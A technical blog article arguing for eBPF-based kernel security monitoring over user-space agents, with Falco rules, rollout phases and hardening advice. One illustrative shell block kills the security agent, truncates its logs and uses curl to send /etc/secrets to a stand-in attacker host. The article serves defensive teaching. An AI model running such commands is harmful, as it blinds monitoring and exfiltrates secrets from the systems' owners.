

Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability

May 19, 2026 9 min read



Key Takeaways

Application-level logging depends on the cooperation of the process being monitored. A compromised process can kill its own watchdog, rewrite logs, or simply skip generating them. Your security visibility should not hinge on an attacker's willingness to be observed.
eBPF attaches probes directly to the Linux kernel's syscall interface, giving you visibility that persists even when an attacker has root inside a container. Disabling an eBPF probe requires breaking out of the container and gaining host-level privileges, which is a far harder problem than running kill -9.
Teams that have replaced a stack of user-space security agents with a single eBPF-based agent report cutting security-related CPU consumption by 60-80%, and telemetry volume drops sharply because filtering happens in the kernel instead of in a SIEM you are paying per GB for.
Roll out eBPF security in phases: observe first, alert second, enforce last. Skipping straight to enforcement is how you get paged at 3 AM because a detection rule killed your payment service.
Falco (CNCF graduated) and Tetragon (Cilium sub-project) are production-ready today. You do not need to write kernel code to get started.

Introduction

Last year I was looking into a post-mortem from an incident where a container breakout went completely undetected in a production Kubernetes cluster. The security team pulled up dashboards, scrolled through logs, and found nothing useful. Turns out the attacker had killed the logging sidecar as a first move. Everything that happened after that was invisible.

The attack itself was not particularly clever. The monitoring stack just had a structural weakness baked in: the agent shared user space with the thing it was supposed to watch. Root in the container meant kill -9 on the agent, truncate on the log files, and then free rein. Fileless payloads via memfd_create() never touched the filesystem. Process injection hid behind trusted PIDs. The logging layer was the softest target in the whole setup.

That write-up got me digging into eBPF seriously. Every process, malicious or not, has to cross the syscall boundary to open files, connect to the network, or spawn children. eBPF lets you instrument that boundary inside the kernel itself, where a container-level attacker simply cannot reach it.

This article covers the architecture behind eBPF-based security monitoring, how to roll it out without breaking production, the cost story at scale, and which tools are worth your time right now.

The Problem with User-Space Security Agents

Living at the Same Privilege Level as the Threat

Most Kubernetes security monitoring runs as sidecar containers or DaemonSets, basically user-space processes sitting alongside the workloads they watch.

Figure 1: Traditional sidecar-based security monitoring. The agent shares the same privilege boundary as the workloads it monitors. (Original diagram by the author)

This architecture has a fundamental issue: the security agent and the attacker operate at the same level. With root in the container, an attacker can:

$ kill -9 $(pgrep security-agent)
$ truncate -s 0 /var/log/agent/*.log
$ curl http://attacker.com/exfil -d @/etc/secrets

No alert ever fires because the agent was dead before anything interesting happened.

The CPU Tax

User-space agents also impose real cost. Agents that inspect network traffic typically proxy connections through themselves, which means every packet crosses the user-kernel boundary multiple times. Add log serialization, parsing, and transmission on top, and it is easy to lose a meaningful slice of cluster CPU to security overhead alone. I have seen clusters where the monitoring stack consumed more resources than several of the services it was protecting.

What Attackers Know

Capable adversaries specifically target these gaps. memfd_create() lets code execute from memory without ever touching the filesystem, so file integrity monitors see nothing. Process injection hides behind trusted binaries the agent already ignores. Log evasion exploits the window between malicious activity and log shipment to delete evidence. The monitoring layer is the first thing a skilled attacker takes out, and the current architecture makes that easy.

How eBPF Changes the Equation

The Short Version

eBPF lets you run sandboxed programs inside the Linux kernel without writing a kernel module. Originally a packet filtering mechanism (hence "Berkeley Packet Filter"), the modern extended version is a general-purpose kernel instrumentation framework. Three things matter for security:

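A built-in verifier statically analyzes every eBPF program at load time, proving it cannot crash the kernel, access unauthorized memory, or loop forever. If verification fails, the program never runs. Because the check happens once at load time, it adds no runtime overhead, and it rules out the unbounded loops and wild memory accesses that let a buggy kernel module panic the machine.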
eBPF programs execute in kernel context with direct access to kernel data structures. No user-kernel context switches, no proxy overhead.
You can attach probes to thousands of kernel functions, syscalls, network events, and tracepoints.

The Verifier Deserves Its Own Paragraph

Running custom code in the kernel makes people nervous, and with kernel modules that nervousness is justified: a buggy module can panic the machine. eBPF's verifier is built to close off that failure mode. It walks every possible execution path through the bytecode and checks termination guarantees, memory bounds, function call restrictions, and stack depth (capped at 512 bytes), all statically and all before the program loads.
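The idea of checking every path before anything runs can be illustrated with a deliberately tiny model. The Python sketch below is not the kernel verifier and uses a made-up four-instruction bytecode (all names are hypothetical). It explores every branch of a program and rejects it if any path jumps backward (the pre-5.3 rule against loops), runs off the end of the program, or pushes the stack past 512 bytes.

```python
from typing import List, Set, Tuple

STACK_LIMIT = 512  # bytes; the same cap the real eBPF stack has

# Hypothetical toy instruction set:
#   ("push", n)   grow the stack by n bytes
#   ("jmp", t)    jump to instruction t
#   ("jcond", t)  either jump to t or fall through to the next instruction
#   ("exit",)     end of program
Insn = Tuple


def verify(prog: List[Insn]) -> Tuple[bool, str]:
    """Explore every execution path; accept the program only if all paths are safe."""
    work: List[Tuple[int, int]] = [(0, 0)]  # (program counter, stack bytes in use)
    seen: Set[Tuple[int, int]] = set()      # states already checked (simple pruning)
    while work:
        pc, depth = work.pop()
        if (pc, depth) in seen:
            continue
        seen.add((pc, depth))
        if not 0 <= pc < len(prog):
            return False, f"path falls off the program at pc={pc}"
        op = prog[pc]
        if op[0] == "exit":
            continue
        if op[0] == "push":
            depth += op[1]
            if depth > STACK_LIMIT:
                return False, f"stack {depth} > {STACK_LIMIT} at pc={pc}"
            work.append((pc + 1, depth))
        elif op[0] in ("jmp", "jcond"):
            target = op[1]
            if target <= pc:  # backward edge: could be an unbounded loop
                return False, f"backward jump at pc={pc}"
            work.append((target, depth))
            if op[0] == "jcond":
                work.append((pc + 1, depth))  # the fall-through path
        else:
            return False, f"unknown instruction {op[0]!r} at pc={pc}"
    return True, "ok"


SAFE = [("push", 64), ("jcond", 3), ("push", 128), ("exit",)]
LOOP = [("push", 8), ("jmp", 0)]
TOO_DEEP = [("push", 300), ("jcond", 3), ("push", 300), ("exit",)]

if __name__ == "__main__":
    for name, prog in [("SAFE", SAFE), ("LOOP", LOOP), ("TOO_DEEP", TOO_DEEP)]:
        print(name, verify(prog))
```

TOO_DEEP is rejected even though one of its two paths stays under the limit, because a single unsafe path is enough. The real verifier does far more (register types, pointer bounds, helper-call rules) and, since kernel 5.3, accepts loops it can prove are bounded.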

The verifier is strict on purpose. It will reject programs that are actually safe but too complex for it to prove correct. Anyone who has worked with eBPF has hit this. You end up restructuring perfectly valid code just to satisfy the verifier. But that conservatism is why Meta, Google, and Netflix run eBPF in their production kernels at massive scale.

Where the Probes Sit

For security, eBPF programs attach at the syscall interface, the boundary every process must cross for privileged operations.

Figure 2: eBPF probes sit at the syscall interface. Every process, including an attacker's, must cross this boundary. (Original diagram by the author)

When any process calls connect(), execve(), or open(), the probe captures the syscall arguments, process and thread IDs, user ID, capabilities, cgroup ID, and parent process information; the user-space side of the agent then maps the cgroup to a container ID and Kubernetes pod metadata. Because the probe runs in kernel context, an attacker with root inside a container would need to break out of the container and gain host-level privileges to tamper with it. That is a completely different class of problem compared to killing a user-space process.

The Cost Story

Organizations that have replaced a multi-agent user-space security stack with a single eBPF-based agent report CPU reductions of 60-80% on security workloads.

Figure 3: Overhead comparison between user-space security agents and eBPF kernel-level monitoring. (Original diagram by the author)

There is a data volume angle too. User-space agents ship every log line, connection event, and file access to a centralized platform where most of it gets thrown away after ingestion. With eBPF the filtering happens in the kernel, so only events that actually matter leave the node. The SIEM ingestion cost reduction varies, but for most workloads it is substantial.
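The mechanics of that saving fit in a few lines. The Python sketch below is a user-space model, not eBPF code: ship_everything stands in for an agent that forwards every event, and filter_at_source stands in for a probe that evaluates the predicate before an event ever leaves the kernel. The event mix and the is_interesting policy are synthetic and hypothetical, so the numbers it prints say nothing about your workload; only the shape of the comparison matters.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, List


@dataclass(frozen=True)
class Event:
    syscall: str
    binary: str
    dest_ip: str = ""


def ship_everything(events: Iterable[Event]) -> List[Event]:
    """User-space model: every event leaves the node; filtering happens after ingestion."""
    return list(events)


def filter_at_source(events: Iterable[Event], keep: Callable[[Event], bool]) -> List[Event]:
    """Kernel-filtering model: the predicate runs where events originate."""
    return [e for e in events if keep(e)]


def is_interesting(e: Event) -> bool:
    # Hypothetical policy: unexpected binaries, or any contact with the metadata service.
    unexpected_exec = e.syscall == "execve" and e.binary != "java"
    return unexpected_exec or e.dest_ip == "169.254.169.254"


# Synthetic event mix for illustration only, not a measurement.
EVENTS = (
    [Event("openat", "java")] * 900
    + [Event("connect", "java", "10.0.0.5")] * 95
    + [Event("execve", "sh")] * 4
    + [Event("connect", "curl", "169.254.169.254")]
)

if __name__ == "__main__":
    shipped = len(ship_everything(EVENTS))
    kept = len(filter_at_source(EVENTS, is_interesting))
    print(f"user-space: {shipped} events, in-kernel filter: {kept} events")
```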

Kernel Compatibility

The features that matter for production security landed across kernels 4.1 through 5.7:

Feature	Minimum Kernel	Description
Basic tracing	4.1	kprobes (uprobes from 4.3)
Syscall tracing	4.7	Tracepoint-based syscall monitoring
Container awareness	4.15	cgroup-based filtering
BTF (type information)	5.2	Portable eBPF programs
bpf_send_signal	5.3	Process termination from eBPF
LSM hooks	5.7	Security policy enforcement

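Most production Kubernetes distributions ship with 5.4+, so kernel version is rarely a blocker. It is worth checking your specific nodes, but I have not run into a kernel version problem on any reasonably current distribution. Version is not the whole story for enforcement, though: BPF LSM hooks also need a kernel built with CONFIG_BPF_LSM and bpf included in the active LSM list (the lsm= boot parameter).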
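As a first pass over a fleet, a version check like the Python sketch below can help. It hard-codes only the Container awareness, BTF, bpf_send_signal, and LSM hooks rows from the table and compares them against platform.release(). Treat it as a heuristic: distribution kernels backport features, and some features also depend on build and boot configuration, so a passing check is not proof that a feature is usable on that node.

```python
import platform
import re
from typing import List, Tuple

# A subset of the compatibility table: (feature, minimum (major, minor) kernel).
MIN_KERNEL: List[Tuple[str, Tuple[int, int]]] = [
    ("Container awareness", (4, 15)),
    ("BTF (type information)", (5, 2)),
    ("bpf_send_signal", (5, 3)),
    ("LSM hooks", (5, 7)),
]


def parse_release(release: str) -> Tuple[int, int]:
    """Extract (major, minor) from a release string such as '5.15.0-1051-aws'."""
    m = re.match(r"(\d+)\.(\d+)", release)
    if m is None:
        raise ValueError(f"unrecognized kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2))


def check(release: str) -> List[Tuple[str, bool]]:
    """Report, per feature, whether the version meets the table's minimum."""
    version = parse_release(release)
    return [(name, version >= minimum) for name, minimum in MIN_KERNEL]


if __name__ == "__main__":
    for name, ok in check(platform.release()):
        status = "yes" if ok else "no"
        print(f"{status:<4}{name}")
```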

Rolling It Out Without Breaking Production

Do not skip straight to enforcement. That path leads to false positives killing production processes and a very awkward post-mortem.

Figure 4: Phased rollout: observe, alert, then enforce. Base progression on confidence, not calendar dates. (Original diagram by the author)

Phase 1: Watch and Learn

Deploy an eBPF agent (Falco or Tetragon) as a DaemonSet in passive mode. The agent observes all syscalls but blocks nothing. You need host-level access and kernel debug mounts:


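spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: agent
    # Pin to a verified digest in production; :latest is used here only for brevity
    image: falcosecurity/falco-no-driver:latest
    securityContext:
      privileged: true
    volumeMounts:
    - name: bpf-fs
      mountPath: /sys/fs/bpf
    - name: kernel-debug
      mountPath: /sys/kernel/debug
      readOnly: true
  # The mounts above need matching hostPath volumes
  volumes:
  - name: bpf-fs
    hostPath:
      path: /sys/fs/bpf
  - name: kernel-debug
    hostPath:
      path: /sys/kernel/debug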

Falco's Helm chart handles the full DaemonSet config. For a first deployment, start there.

During this phase, you are building baselines: which binaries each service runs, what network connections it establishes, what files it touches, what the normal process tree looks like. Stream events to cheap archival storage, not your real-time analytics platform. Move to the next phase once your baselines are stable across a few deployment cycles.
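Baselining is conceptually just set-building. Here is a minimal Python sketch, assuming events have already been reduced to hypothetical (service, kind, value) tuples, where kind is something like exec or connect. build_baseline records everything each service did in an observation window, and drift reports behavior that appeared in a newer window but not in an older one. An empty drift across a few deployment cycles is one concrete way to decide a baseline is stable.

```python
from collections import defaultdict
from typing import Dict, Iterable, Set, Tuple

# Hypothetical normalized event: (service, kind, value),
# e.g. ("payment-api", "exec", "java") or ("payment-api", "connect", "10.0.3.7:5432").
Event = Tuple[str, str, str]
Baseline = Dict[str, Set[Tuple[str, str]]]


def build_baseline(events: Iterable[Event]) -> Baseline:
    """Collect every (kind, value) pair each service exhibited during the window."""
    baseline: Dict[str, Set[Tuple[str, str]]] = defaultdict(set)
    for service, kind, value in events:
        baseline[service].add((kind, value))
    return dict(baseline)


def drift(older: Baseline, newer: Baseline) -> Baseline:
    """Per service, behavior seen in the newer window but absent from the older one."""
    result: Baseline = {}
    for service, behaviors in newer.items():
        new = behaviors - older.get(service, set())
        if new:
            result[service] = new
    return result


week1 = build_baseline([
    ("payment-api", "exec", "java"),
    ("payment-api", "connect", "10.0.3.7:5432"),
])
week2 = build_baseline([
    ("payment-api", "exec", "java"),
    ("payment-api", "exec", "jcmd"),
    ("payment-api", "connect", "10.0.3.7:5432"),
])

if __name__ == "__main__":
    print(drift(week1, week2))
```

jcmd is a JDK diagnostic tool, so whether it belongs in the baseline is a human decision; the observation phase is where you make that call, before any rule depends on it.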

Phase 2: Alert on Anomalies

Now write detection rules against the baselines. This is behavioral detection, not signature matching. You are looking for deviations from what you know is normal.
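The difference between the two approaches shows up with a payload nobody has written a signature for. In this hypothetical Python sketch, the signature list and the baseline are both invented for illustration: signature matching fires only on known-bad strings, while the behavioral check fires on anything the service has not been observed doing.

```python
from typing import Dict, Set

# Hypothetical known-bad command-line fragments (signature approach).
SIGNATURES = ("nc -e", "bash -i", "/dev/tcp/")

# Hypothetical learned baseline: what each service normally executes (behavioral approach).
BASELINE: Dict[str, Set[str]] = {"payment-api": {"java", "jcmd", "jstat"}}


def signature_alert(cmdline: str) -> bool:
    """Fire only if the command line contains a known-bad fragment."""
    return any(sig in cmdline for sig in SIGNATURES)


def behavioral_alert(service: str, binary: str) -> bool:
    """Fire if the binary is outside what this service was observed running."""
    return binary not in BASELINE.get(service, set())


if __name__ == "__main__":
    # A novel payload: no signature matches, but the service never ran it before.
    service, binary, cmdline = "payment-api", "/tmp/.cache/x", "/tmp/.cache/x --quiet"
    print("signature:", signature_alert(cmdline))
    print("behavioral:", behavioral_alert(service, binary))
```

The trade-off runs the other way too: a behavioral rule also fires on a legitimate but new binary, which is why tuning in this phase matters.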

A Falco rule for unexpected process execution in a payment service:


- rule: Unexpected Process in Payment Service
  desc: Detect execution of binaries not in the approved list
  condition: >
    spawned_process and
    container.name startswith "payment-" and
    not proc.name in (java, jcmd, jstat)
  output: >
    Unexpected process executed in payment container
    (user=%user.name container=%container.name 
     process=%proc.name cmdline=%proc.cmdline
     parent=%proc.pname)
  priority: WARNING
  tags: [container, process, payment]

And one for metadata service access, which is almost always a sign of trouble:


- rule: Container Accessing Cloud Metadata Service
  desc: Detect attempts to access instance metadata
  condition: >
    outbound and
    fd.sip = "169.254.169.254" and
    container.id != host
  output: >
    Container attempted metadata service access
    (container=%container.name pod=%k8s.pod.name
     namespace=%k8s.ns.name dest=%fd.sip)
  priority: CRITICAL
  tags: [network, cloud, metadata]

Spend real time tuning during this phase. Review every alert, understand the false positives, suppress the known-good patterns. Move to enforcement only once the alert volume is manageable and you have validated rules against known attack scenarios.

Phase 3: Enforce

With high confidence in your detection rules, enable active blocking. Tetragon can use bpf_send_signal() to SIGKILL a process before the offending syscall completes. Response time is measured in microseconds, not the minutes or hours of a traditional IR workflow.

A typical enforcement scenario: a container calls connect() to 169.254.169.254, the eBPF probe intercepts it, policy evaluation flags a violation, SIGKILL fires, the syscall never completes, and the alert goes out. The metadata service was never reached.
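The decision logic behind that sequence, and how it changes across the three rollout phases, can be modeled in a few lines. This is a hypothetical user-space Python sketch: in Tetragon the policy is evaluated in the kernel and the kill is delivered with bpf_send_signal(), but the branching follows the same idea. Mode, Connect, handle, and BLOCKED_DESTINATIONS are illustrative names, not Tetragon's API.

```python
from enum import Enum
from typing import List, NamedTuple


class Mode(Enum):
    OBSERVE = "observe"   # Phase 1: record only
    ALERT = "alert"       # Phase 2: record and alert
    ENFORCE = "enforce"   # Phase 3: record, kill, and alert


class Connect(NamedTuple):
    pid: int
    pod: str
    dest_ip: str


# Hypothetical policy: containers must never reach the cloud metadata service.
BLOCKED_DESTINATIONS = {"169.254.169.254"}


def handle(event: Connect, mode: Mode) -> List[str]:
    """Return, in order, the actions taken for one intercepted connect() call."""
    actions = [f"record pid={event.pid} pod={event.pod} dest={event.dest_ip}"]
    if event.dest_ip not in BLOCKED_DESTINATIONS:
        return actions  # policy satisfied: let the syscall proceed
    if mode is Mode.ENFORCE:
        actions.append("SIGKILL")  # in Tetragon, sent from the kernel via bpf_send_signal()
    if mode in (Mode.ALERT, Mode.ENFORCE):
        actions.append("alert")
    return actions


if __name__ == "__main__":
    evt = Connect(pid=4242, pod="payment-api", dest_ip="169.254.169.254")
    for mode in Mode:
        print(mode.value, handle(evt, mode))
```

Keeping the mode a single switch over one policy is one way to make the phased rollout cheap: the rules tuned during alerting are exactly the ones that start killing processes.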

This phase demands discipline. A false positive that kills a legitimate process is a production outage. The observation and alerting phases exist specifically to build enough confidence that enforcement does not become a liability.

Tooling: Falco, Tetragon, and the Vendors

Falco is where I would start for most teams. It is a CNCF graduated project with a big community, active development, and years of production mileage. It hooks into the syscall interface via eBPF and evaluates events against a YAML-based rule engine. The default ruleset maps to MITRE ATT&CK and covers reverse shells, container escapes, sensitive path access, and more.

What I find most valuable about Falco is the Kubernetes context it attaches to events. The difference between "process X called connect() to 169.254.169.254" and "the payment-api pod in prod namespace tried to reach the cloud metadata service" is the difference between fifteen minutes of cross-referencing and an immediately actionable alert.
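That enrichment is, at its core, a join. In the minimal Python sketch below, the kernel side is assumed to report only a cgroup ID, and a hypothetical pods_by_cgroup table (which a real agent would typically keep current from the container runtime or the Kubernetes API) turns it into a pod and namespace. The names and the cgroup ID are invented for illustration.

```python
from typing import Dict, NamedTuple


class RawEvent(NamedTuple):
    syscall: str
    cgroup_id: int
    dest_ip: str


class PodInfo(NamedTuple):
    namespace: str
    pod: str


# Friendly names for well-known destinations (illustrative).
DEST_LABELS = {"169.254.169.254": "the cloud metadata service"}


def render(event: RawEvent, pods_by_cgroup: Dict[int, PodInfo]) -> str:
    """Turn a raw kernel-side event into an alert a human can act on."""
    dest = DEST_LABELS.get(event.dest_ip, event.dest_ip)
    pod = pods_by_cgroup.get(event.cgroup_id)
    if pod is None:  # unknown cgroup: fall back to the raw identifiers
        return f"process in cgroup {event.cgroup_id} called {event.syscall}() to {dest}"
    return f"the {pod.pod} pod in {pod.namespace} namespace called {event.syscall}() to {dest}"


if __name__ == "__main__":
    pods = {4026: PodInfo(namespace="prod", pod="payment-api")}
    print(render(RawEvent("connect", 4026, "169.254.169.254"), pods))
```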

For active enforcement, where you need to kill a process before a malicious syscall completes, look at Tetragon. It is a Cilium sub-project and applies policy synchronously in the kernel. The trade-off is a smaller community and tighter coupling to the Cilium stack. Commercial vendors like Sysdig, Datadog, and Wiz have also rebuilt their agents on eBPF. If you already use one of them, check what eBPF capabilities you have before adding another tool.

Securing the eBPF Deployment Itself

eBPF programs run in the kernel with elevated privileges, so do not hand-wave the deployment security. Loading programs requires CAP_BPF (or CAP_SYS_ADMIN on kernels before 5.8). Start with a privileged container if you must, then tighten to the minimum capabilities, usually CAP_BPF, CAP_PERFMON, and CAP_SYS_RESOURCE. Beyond that:

Lock down which service accounts can deploy elevated-capability containers
Use admission controllers (OPA Gatekeeper, Kyverno) to confine privileged workloads to the security namespace
Monitor that namespace for unauthorized changes
Pin agent images to verified digests, not mutable tags
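The capability and image-pinning rules are simple enough to express as code. Real enforcement belongs in OPA Gatekeeper or Kyverno policies; the Python sketch below only illustrates the checks such a policy would make against a container spec, assuming a hypothetical dedicated namespace called security and the minimum capability set named earlier. It also flags privileged: true, because it describes the tightened end state rather than the privileged starting point.

```python
import re
from typing import Dict, List

# Kubernetes lists capabilities without the CAP_ prefix.
ALLOWED_CAPS = {"BPF", "PERFMON", "SYS_RESOURCE"}
SECURITY_NAMESPACE = "security"  # hypothetical namespace name
DIGEST = re.compile(r"@sha256:[0-9a-f]{64}$")


def violations(namespace: str, container: Dict) -> List[str]:
    """Return every policy problem found in one container spec (empty list = compliant)."""
    problems: List[str] = []
    ctx = container.get("securityContext", {})
    adds = set(ctx.get("capabilities", {}).get("add", []))
    privileged = bool(ctx.get("privileged", False))
    if (privileged or adds) and namespace != SECURITY_NAMESPACE:
        problems.append(f"elevated container outside '{SECURITY_NAMESPACE}' namespace")
    if privileged:
        problems.append("privileged: true; prefer explicit capabilities")
    extra = adds - ALLOWED_CAPS
    if extra:
        problems.append(f"capabilities beyond minimum: {sorted(extra)}")
    if not DIGEST.search(container.get("image", "")):
        problems.append("image not pinned to a sha256 digest")
    return problems


if __name__ == "__main__":
    spec = {
        "image": "falcosecurity/falco-no-driver:latest",
        "securityContext": {"privileged": True},
    }
    for problem in violations("default", spec):
        print(problem)
```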

The verifier handles bytecode safety. Operational safety is on you.

Conclusion

Application-level logging is not going away. You still need it for debugging business logic and tracing requests through service meshes. But for security, where the adversary's first move is to disable your instrumentation, you need monitoring at a layer they cannot easily reach.

eBPF gives you that. Syscall-level visibility that persists regardless of what the application does, instrumentation that lives in the kernel where container-level compromise cannot touch it, and overhead that is a fraction of what user-space agents impose.

If you want to see it for yourself: deploy Falco on a staging cluster in observation-only mode. Spend thirty minutes looking at the events it captures. The gap between what your current monitoring shows and what eBPF reveals at the syscall level will make the case better than anything I can write here. And if you are already running eBPF-based security in production, share what you have learned. There is not nearly enough real-world operational knowledge circulating in this space.

About the Author

Niranjan Sharma

